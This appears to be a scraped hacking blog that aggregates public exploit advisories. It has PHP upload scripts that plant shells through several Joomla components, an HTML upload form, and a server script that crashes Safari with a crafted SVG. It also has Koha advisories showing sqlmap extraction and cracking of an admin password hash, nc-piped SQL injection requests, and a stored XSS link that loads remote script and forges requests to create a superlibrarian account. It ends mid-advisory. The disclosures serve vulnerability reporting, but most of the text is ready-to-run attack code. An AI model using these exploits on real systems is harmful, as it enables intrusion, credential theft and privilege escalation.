source: https://www.securityfocus.com/bid/53968/info
The Simple SWFUpload component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Simple SWFUpload 2.0 is vulnerable;other versions may also be affected.
<?php
$uploadfile="lo.php.gif";
$ch =
curl_init("http://www.exemple.com/administrator/components/com_simpleswfupload/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/images/stories/lo.php.gif
lo.php.gif
<?php
phpinfo();
?>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149168
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/53969/info
The Art Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Art Uploader 1.0.1 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.example.com/modules/mod_artuploader/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('userfile'=>"@$uploadfile",
'path'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.example.com/modules/mod_artuploader/lo.php
lo.php
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53972/info
The DentroVideo component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
DentroVideo 1.2 is vulnerable; other versions may also be affected.
Exploit 1 :
PostShell.php
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.example.com/components/com_dv/externals/phpupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file1'=>"@$uploadfile",
'action'=>'upload'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.example.com/lo.php
lo.php
<?php
phpinfo();
?>
Exploit 2 :
PostShell2.php
<?php
$uploadfile="lo.php.mpg3";
$ch =
curl_init("http://www.example.com/components/com_dv/externals/swfupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.example.com/dvvideos/uploads/originals/lo.php.mpg3
lo.php.mpg3
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53973/info
The IDoEditor component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.
IDoEditor 1.6.16 is vulnerable; other versions may also be affected.
<html>
<body>
<center>
<form
action="http://www.example.com/plugins/editors/idoeditor/themes/advanced/php/image.php"
method="post" enctype="multipart/form-data">
<input type="file" name="pfile">
<input type="submit" name="Submit" value="Upload">
</form>
</center>
</body>
</html>
source: https://www.securityfocus.com/bid/53975/info
The jFancy component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
jFancy 2.03 is vulnerable; other versions may also be affected.
Exploit :
PostShell.php
<?php
$uploadfile="lo.php.gif";
$ch = curl_init("http://www.example.com/modules/mod_jfancy/script.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('photoupload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.example.com/images/lo.php.gif
lo.php.gif
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53977/info
The Easy Flash Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.
Easy Flash Uploader 2.0 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.example.com/plugins/content/efup_files/helper.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'JPATH_BASE'=>'../../../',
'filesize'=>'2000',
'filetypes'=>'*.*',
'mimetypes'=>"*",
'destination'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
#!/usr/bin/php
<?php
# Title : Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of
Concept
# Product Website: https://www.apple.com/safari/
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
# Usage :
# php poc.php
# Open Safari and open ip:8080 / 127.0.0.1:8080
# Crashed ;)
#Main POC Code
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create
socket!');
socket_bind($reza, 0,8080);
socket_listen($reza);
print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n";
$msg =
'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
$msgd=base64_decode($msg);
for (;;) {
if ($client = @socket_accept($reza)) {
socket_write($client, "HTTP/1.1 200 OK\r\n" .
"Content-length: " . strlen($msgd) . "\r\n" .
"Content-Type: text/html; charset=UTF-8\r\n\r\n" .
$msgd);
}
else usleep(100000);
}
#Crash Report
/*
Process Model:
Multiple Web Processes
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 libsystem_kernel.dylib 0x00007fff8e628286 __pthread_kill +
10
1 libsystem_c.dylib 0x00007fff90619b53 abort + 129
2 libsystem_c.dylib 0x00007fff905e1c39 __assert_rtn + 321
3 com.apple.CoreGraphics 0x00007fff87716e4e
CGPathCreateMutableCopyByTransformingPath + 242
4 com.apple.CoreGraphics 0x00007fff8773aff0 CGContextAddPath +
93
5 com.apple.WebCore 0x0000000104ea8c84
WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
6 com.apple.WebCore 0x000000010597e851
WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&,
WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*,
WebCore::RenderSVGShape const*) + 65
7 com.apple.WebCore 0x000000010597f08a
WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&,
WebCore::GraphicsContext*) + 122
8 com.apple.WebCore 0x000000010597f3c3
WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
9 com.apple.WebCore 0x0000000104fa73cb
WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 379
10 com.apple.WebCore 0x0000000104fa7062
WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 1330
11 com.apple.WebCore 0x0000000104f1ee72
WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 722
12 com.apple.WebCore 0x0000000105429e88
WebCore::InlineElementBox::paint(WebCore::PaintInfo&,
WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) +
312
13 com.apple.WebCore 0x0000000104ea4a63
WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
14 com.apple.WebCore 0x0000000104ea4509
WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
15 com.apple.WebCore 0x0000000104e53d96
WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*,
WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
16 com.apple.WebCore 0x0000000104e51373
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 67
17 com.apple.WebCore 0x0000000104e50724
WebCore::RenderBlock::paintObject(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 420
18 com.apple.WebCore 0x0000000104e529af
WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 287
19 com.apple.WebCore 0x00000001058db139
WebCore::RenderBlock::paintChild(WebCore::RenderBox&,
WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&,
bool) + 393
20 com.apple.WebCore 0x0000000104e51478
WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&,
WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
21 com.apple.WebCore 0x0000000104e51420
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 240
22 com.apple.WebCore 0x0000000104e50724
WebCore::RenderBlock::paintObject(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 420
23 com.apple.WebCore 0x0000000104e529af
WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 287
24 com.apple.WebCore 0x0000000104e512b2
WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase,
WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&,
WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo
const&, unsigned int, WebCore::RenderObject*) + 370
25 com.apple.WebCore 0x0000000104e50f87
WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment,
1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*,
WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int,
WebCore::RenderObject*, bool, bool) + 423
26 com.apple.WebCore 0x0000000104e4fc30
WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
27 com.apple.WebCore 0x0000000104e4f002
WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
28 com.apple.WebCore 0x0000000104e4fd62
WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
29 com.apple.WebCore 0x0000000104e7ac36
WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer
const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned
int, unsigned int) + 358
30 com.apple.WebCore 0x000000010593757f
WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer
const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect
const&) + 799
31 com.apple.WebCore 0x000000010537dd44
WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&,
WebCore::FloatRect const&) + 132
32 com.apple.WebCore 0x00000001058b6ad9
WebCore::PlatformCALayer::drawLayerContents(CGContext*,
WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul,
WTF::CrashOnOverflow>&) + 361
33 com.apple.WebCore 0x0000000105b170a7
WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*,
WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
34 com.apple.WebCore 0x0000000105ba36cc -[WebSimpleLayer
drawInContext:] + 172
35 com.apple.QuartzCore 0x00007fff8d7033c7
CABackingStoreUpdate_ + 3306
36 com.apple.QuartzCore 0x00007fff8d7026d7
___ZN2CA5Layer8display_Ev_block_invoke + 59
37 com.apple.QuartzCore 0x00007fff8d702694
x_blame_allocations + 81
38 com.apple.QuartzCore 0x00007fff8d6f643c
CA::Layer::display_() + 1546
39 com.apple.WebCore 0x0000000105ba35eb -[WebSimpleLayer
display] + 43
40 com.apple.QuartzCore 0x00007fff8d6f47fd
CA::Layer::display_if_needed(CA::Transaction*) + 603
41 com.apple.QuartzCore 0x00007fff8d6f3e81
CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
42 com.apple.QuartzCore 0x00007fff8d6f3612
CA::Context::commit_transaction(CA::Transaction*) + 242
43 com.apple.QuartzCore 0x00007fff8d6f33ae
CA::Transaction::commit() + 390
44 com.apple.QuartzCore 0x00007fff8d701f19
CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long,
void*) + 71
45 com.apple.CoreFoundation 0x00007fff869f7127
__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
46 com.apple.CoreFoundation 0x00007fff869f7080
__CFRunLoopDoObservers + 368
47 com.apple.CoreFoundation 0x00007fff869e8bf8
CFRunLoopRunSpecific + 328
48 com.apple.HIToolbox 0x00007fff8df1156f
RunCurrentEventLoopInMode + 235
49 com.apple.HIToolbox 0x00007fff8df112ea
ReceiveNextEventCommon + 431
50 com.apple.HIToolbox 0x00007fff8df1112b
_BlockUntilNextEventMatchingListInModeWithFilter + 71
51 com.apple.AppKit 0x00007fff8ebe59bb _DPSNextEvent +
978
52 com.apple.AppKit 0x00007fff8ebe4f68 -[NSApplication
nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
53 com.apple.AppKit 0x00007fff8ebdabf3 -[NSApplication
run] + 594
54 com.apple.AppKit 0x00007fff8eb57354 NSApplicationMain
+ 1832
55 libxpc.dylib 0x00007fff8ab77958 _xpc_objc_main +
793
56 libxpc.dylib 0x00007fff8ab79060 xpc_main + 490
57 com.apple.WebKit.WebContent 0x0000000103f10b40 0x103f10000 + 2880
58 libdyld.dylib 0x00007fff873e45c9 start + 1
*/
?>
# Exploit Title: Koha Open Source ILS - Unauthenticated SQL Injection in OPAC
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4633
### CVE-2015-4633 ###
#### Titel: ####
Unauthenticated SQL Injection in Koha
#### Type of vulnerability: ####
An Unauthenticated SQL Injection vulnerability in Koha allows attackers to read arbitrary data from the database.
##### Exploitation vector:
The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.
##### Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access the filesystem may be possible.
#### Impact: ####
critical
#### Software/Product name: ####
Koha
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12
#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
#### Vendor: ####
http://koha-community.org/ (Open Source)
#### CVE number: ####
CVE-2015-4633
#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities
#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org
#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
#### Description: ####
By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.
#### Proof-of-concept: ####
1. Inspect Koha database schema
Have a look at how to query the database for superlibrarian users:
http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians
So basically we we need to execute some SQL statement like this:
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
2. Query the database with sqlmap
So let's fire up sqlmap with the --sql-shell parameter and input the query:
root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150513}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:20:07
[09:20:07] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: number (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
---
[09:20:09] [INFO] testing MySQL
[09:20:09] [INFO] confirming MySQL
[09:20:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
[09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'
[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
admin
[09:21:46] [INFO] retrieved: $2a$08$taQ
[09:23:33] [ERROR] invalid character detected. retrying..
[09:23:33] [WARNING] increasing time delay to 5 seconds
afOgEEhU
[09:25:10] [ERROR] invalid character detected. retrying..
[09:25:10] [WARNING] increasing time delay to 6 seconds
t/gW
[09:26:13] [ERROR] invalid character detected. retrying..
[09:26:13] [WARNING] increasing time delay to 7 seconds
TOmqnYe1Y6ZNxCENa
[09:29:57] [ERROR] invalid character detected. retrying..
[09:29:57] [WARNING] increasing time delay to 8 seconds
2.ONk2eZhnuEw5z9OjjxS
[09:35:08] [ERROR] invalid character detected. retrying..
[09:35:08] [WARNING] increasing time delay to 9 seconds
select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:
'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'
3. Feed john the ripper and be lucky
root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass
root@kali:/home/wicked# john ./admin-pass
Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
admin (?)
guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260 trying: Smokey - allstate
Use the "--show" option to display all of the cracked passwords reliably
root@kali:/home/wicked# john ./admin-pass --show
?:admin
1 password hash cracked, 0 left
4. Log in with username "admin" and password "admin" ;)
### CVE-2015-xxxx ###
#### Titel: ####
Unauthenticated SQL Injection
#### Type of vulnerability: ####
SQL Injection vulnerabilities in Koha staff client allows attackers to read arbitrary data from the database.
##### Exploitation vector:
The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.
##### Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem is possible.
#### Impact: ####
critical
#### Software/Product name: ####
Koha
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12
#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
#### Vendor: ####
http://koha-community.org/ (Open Source)
#### CVE number: ####
CVE-2015-xxxx
#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities
#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org
#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
#### Description: ####
By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.
#### Proof-of-concept: ####
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4630, CVE-2015-4631
### CVE-2015-4631 ###
#### Titel: ####
Multiple XSS and XSRF vulnerabilities in Koha
#### Type of vulnerability: ####
Koha suffers from multiple critical XSS and XSRF vulnerabilities
##### Exploitation vector:
The attack can be performed through a compromised user account (for example previous password retrieval if student user acoount through SQLI - CVE-2015-4633) or due to user that clicks on a malicious link (for example in a phishing mail, forum link etc)
##### Attack outcome:
1. An attacker may escalate privileges and even gain superlibrarian permissions.
2. An attacker may target other users by stealing session tokens, impersonating them or exploiting browser vulnerabilities to gain access on their machines.
3. Perform unauthorized actions with the permissions of a staff member
4. Exploit other known server-side vulnerabilities (see CVE-2015-4633 and CVE-2015-4632) to fully compromise the websever
#### Impact: ####
{low,medium,high,critical}
critical
#### Software/Product name: ####
Koha
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12
#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
#### Vendor: ####
http://koha-community.org/ (Open Source)
#### CVE number: ####
CVE-2015-4631
#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities
#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org
#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
#### Description: ####
Koha suffers from various critical XSS and XSRF vulnerabilities due to imprope input validation. The site also lacks in the implementation of challenge tokens that prevent cross-site forgery (XSRF) attacks. This allows remote remote attackers to inject arbitrary web script or HTML and completely compromise the webpage.
The following pages are affected from stored XSS flaws:
/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl
The following pages are affected from relfective XSS flaws:
/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display")
/cgi-bin/koha/opac-search.pl (parameters: "tag")
/cgi-bin/koha/authorities/authorities-home.pl (parameters: "value")
/cgi-bin/koha/acqui/lateorders.pl (parameters: "delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl (parameters: "limit")
/cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter")
/cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to")
#### Proof-of-concept: ####
Attack scenario:
Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:
http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0
Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens
http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl
the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:
Create new user:
http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1
Give the new user superlibririan permission:
http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian
The attacker can now log as superlibrarian.
Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
Alice needs to have access to the OPAC interface and to have permissions to create public lists.
# Exploit Title: Koha Open Source ILS - Path Traversal in STAFF client
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4632
### CVE-2015-4632 ###
#### Titel: ####
Directory traversal
#### Type of vulnerability: ####
File Path Traversal
##### Exploitation vector:
Injecting into the "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search
##### Attack outcome:
Read access to arbitrary files on the system
#### Impact: ####
{low,medium,high,critical}
high
#### Software/Product name: ####
Koha
#### Affected versions: ####
